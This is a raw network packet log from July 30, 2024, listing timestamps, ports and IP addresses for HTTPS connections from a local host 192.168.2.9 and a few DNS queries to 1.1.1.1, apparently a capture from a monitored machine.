Jul 30, 2024 00:54:37.377531052 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:41.145207882 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:41.145262003 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:41.145318985 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:41.162591934 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:41.162626028 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:41.995184898 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:41.995264053 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.038912058 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:42.038959026 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:42.039064884 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:42.085443974 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:42.085467100 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:42.115699053 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.115729094 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.116379976 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.160501957 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.195847034 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.240500927 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466484070 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466506004 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466515064 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466526985 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466563940 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.466567993 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466586113 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.466600895 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.466607094 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.466631889 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.469263077 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.469310045 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.469314098 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.469333887 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.469476938 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.483427048 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.483427048 CEST | 49712 | 443 | 192.168.2.9 | 20.114.59.183
Jul 30, 2024 00:54:42.483469009 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:42.483488083 CEST | 443 | 49712 | 20.114.59.183 | 192.168.2.9
Jul 30, 2024 00:54:43.619059086 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:43.619390965 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:43.619405031 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:43.620740891 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:43.620798111 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:43.626986980 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:43.627069950 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
Jul 30, 2024 00:54:43.627609968 CEST | 49713 | 443 | 192.168.2.9 | 104.21.79.229
Jul 30, 2024 00:54:43.627634048 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.9
                                                                                Jul 30, 2024 00:54:43.673472881 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.141413927 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.141671896 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.141767979 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.141786098 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.142160892 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.142239094 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.142247915 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.143359900 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.143451929 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.143467903 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.144603968 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.144648075 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.144664049 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.145971060 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.146584034 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.217313051 CEST49713443192.168.2.9104.21.79.229
                                                                                Jul 30, 2024 00:54:44.217344999 CEST44349713104.21.79.229192.168.2.9
                                                                                Jul 30, 2024 00:54:44.300853014 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.300890923 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.300957918 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.305311918 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:44.305352926 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:44.305404902 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:44.305927038 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:44.305936098 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:44.306071043 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.306099892 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.870276928 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.870537996 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.870547056 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.872438908 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.872513056 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.873533964 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.873723030 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.873727083 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.873847961 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.913506031 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:44.913517952 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:44.960493088 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:45.012145042 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:45.012273073 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:45.012299061 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:45.012326956 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:45.012348890 CEST44349719104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:45.012456894 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:45.013096094 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:45.013144970 CEST49719443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:45.033401966 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.033446074 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.033607006 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.033869028 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.033881903 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.253839016 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.254302025 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.254317045 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.255389929 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.255460024 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.256746054 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.256818056 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.256962061 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.256968975 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.309456110 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.484088898 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.484288931 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.484354973 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.484781981 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.484802008 CEST4434972088.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.485018015 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.485340118 CEST49720443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.487828970 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.487864971 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.487956047 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.488315105 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:45.488329887 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:45.536372900 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.536629915 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.536645889 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.537635088 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.537692070 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.539062977 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.539132118 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.539288044 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.539294958 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.581470966 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.680362940 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.680430889 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.680521011 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.680799961 CEST49726443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.680814028 CEST4434972635.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.681555986 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.681583881 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:45.681648016 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.682137966 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:45.682147980 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.099843979 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.099895000 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.099978924 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.100159883 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.100174904 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.175185919 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.175579071 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.175596952 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.175956011 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.176425934 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.176506042 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.176513910 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.220530033 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.220607042 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.236577034 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.241502047 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.241518021 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.241978884 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.242403984 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.242475986 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.242511034 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.284607887 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.284635067 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.324090004 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.324168921 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.324306011 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.324976921 CEST49728443192.168.2.935.190.80.1
                                                                                Jul 30, 2024 00:54:46.324990034 CEST4434972835.190.80.1192.168.2.9
                                                                                Jul 30, 2024 00:54:46.594049931 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:46.594095945 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:46.594156981 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:46.595247030 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:46.595276117 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:46.743066072 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.743164062 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.743279934 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.770185947 CEST49727443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:46.770209074 CEST4434972788.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:46.809531927 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.831521988 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.831548929 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.832828999 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.832886934 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.834937096 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.835032940 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.854111910 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:46.854156017 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:46.854331970 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:46.854656935 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:46.854671955 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:46.890485048 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:46.890510082 CEST44349729142.250.186.132192.168.2.9
                                                                                Jul 30, 2024 00:54:46.938479900 CEST49729443192.168.2.9142.250.186.132
                                                                                Jul 30, 2024 00:54:47.005821943 CEST49732443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:47.005870104 CEST4434973288.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:47.005939960 CEST49732443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:47.006139994 CEST49732443192.168.2.988.212.201.198
                                                                                Jul 30, 2024 00:54:47.006153107 CEST4434973288.212.201.198192.168.2.9
                                                                                Jul 30, 2024 00:54:47.256463051 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.256519079 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:47.258547068 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:47.258563995 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.258830070 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.300561905 CEST49730443192.168.2.9184.28.90.27
                                                                                Jul 30, 2024 00:54:47.348495960 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.354857922 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.355201960 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.355211020 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.356246948 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.356304884 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.356775999 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.356775999 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.356791973 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.356839895 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.401490927 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.401505947 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.449542999 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.503910065 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.504025936 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.504137993 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.504158020 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.504439116 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.506293058 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.509114981 CEST49731443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.509140015 CEST44349731104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.536536932 CEST49733443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.536575079 CEST44349733104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.536662102 CEST49733443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.536868095 CEST49733443192.168.2.9104.21.4.208
                                                                                Jul 30, 2024 00:54:47.536881924 CEST44349733104.21.4.208192.168.2.9
                                                                                Jul 30, 2024 00:54:47.537487030 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.537587881 CEST44349730184.28.90.27192.168.2.9
                                                                                Jul 30, 2024 00:54:47.537663937 CEST49730443192.168.2.9184.28.90.27
Jul 30, 2024 00:54:47.537700891 CEST | 443 | 49730 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:47.537722111 CEST | 49730 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:47.537722111 CEST | 49730 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:47.537729979 CEST | 443 | 49730 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:47.537735939 CEST | 443 | 49730 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:47.564981937 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:47.565023899 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:47.565104961 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:47.565356970 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:47.565371990 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:47.721689939 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:47.722264051 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:47.722289085 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:47.723758936 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:47.723838091 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:47.724210024 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:47.724273920 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:47.724375963 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:47.724381924 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:47.768465042 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:48.026808977 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.027195930 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.027205944 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.028630972 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.028697014 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.029079914 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.029153109 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.029324055 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.029335022 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.071501017 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.169583082 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:48.169687033 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:48.169781923 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:48.176302910 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.176357985 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.176414967 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.176455975 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.176493883 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.176493883 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.177761078 CEST | 49732 | 443 | 192.168.2.9 | 88.212.201.198
Jul 30, 2024 00:54:48.177783012 CEST | 443 | 49732 | 88.212.201.198 | 192.168.2.9
Jul 30, 2024 00:54:48.179239035 CEST | 49733 | 443 | 192.168.2.9 | 104.21.4.208
Jul 30, 2024 00:54:48.179255962 CEST | 443 | 49733 | 104.21.4.208 | 192.168.2.9
Jul 30, 2024 00:54:48.235559940 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.235630035 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.237113953 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.237122059 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.237396955 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.238322973 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.280498028 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.523996115 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.524070024 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.524163008 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.525610924 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.525634050 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:48.525645971 CEST | 49734 | 443 | 192.168.2.9 | 184.28.90.27
Jul 30, 2024 00:54:48.525652885 CEST | 443 | 49734 | 184.28.90.27 | 192.168.2.9
Jul 30, 2024 00:54:51.101264000 CEST | 60760 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:51.116959095 CEST | 53 | 60760 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:51.117033958 CEST | 60760 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:51.117333889 CEST | 60760 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:51.132834911 CEST | 53 | 60760 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:51.588804960 CEST | 53 | 60760 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:51.589529037 CEST | 60760 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:51.605757952 CEST | 53 | 60760 | 1.1.1.1 | 192.168.2.9
Jul 30, 2024 00:54:51.605870008 CEST | 60760 | 53 | 192.168.2.9 | 1.1.1.1
Jul 30, 2024 00:54:57.014966011 CEST | 443 | 49729 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:54:57.015047073 CEST | 443 | 49729 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:54:57.015110016 CEST | 49729 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:54:58.537759066 CEST | 49729 | 443 | 192.168.2.9 | 142.250.186.132
Jul 30, 2024 00:54:58.537785053 CEST | 443 | 49729 | 142.250.186.132 | 192.168.2.9
Jul 30, 2024 00:55:12.625144005 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:12.625191927 CEST | 443 | 60763 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:55:12.625838041 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:55:12.625901937 CEST | 60763 | 443 | 192.168.2.9 | 18.239.18.85
